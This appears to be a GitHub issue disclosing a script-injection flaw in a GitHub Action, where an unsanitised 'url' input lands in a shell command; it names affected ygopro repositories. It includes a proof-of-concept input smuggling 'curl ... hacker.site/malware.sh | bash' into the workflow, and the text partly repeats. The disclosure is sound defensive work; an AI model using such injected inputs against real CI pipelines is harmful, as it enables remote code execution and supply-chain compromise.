In mercury233/action-cache-download-file@v1.2.0
echo "filename=$(basename ${{ inputs.url }})" >> $GITHUB_OUTPUT
If the workflow in ygopro is modified to:
- uses: mercury233/action-cache-download-file@v1.2.0
with:
url: 'https://example.com/file.zip); curl -s http://hacker.site/malware.sh | bash; echo ('
It will be expanded to:
echo "filename=$(basename https://example.com/file.zip); curl -s http://hacker.site/malware.sh | bash; echo ()" >> $GITHUB_OUTPUT
which leads to script injection.
It will put these repos at risk:
Fluorohydride/ygopro
Fluorohydride/ygopro-core
mercury233/irrlicht
@Wind2009-Louse
In mercury233/action-cache-download-file@v1.2.0
echo "filename=$(basename ${{ inputs.url }})" >> $GITHUB_OUTPUTIf the workflow in ygopro is modified to:
It will be expanded to:
which leads to script injection.
It will put these repos at risk:
Fluorohydride/ygopro
Fluorohydride/ygopro-core
mercury233/irrlicht
@Wind2009-Louse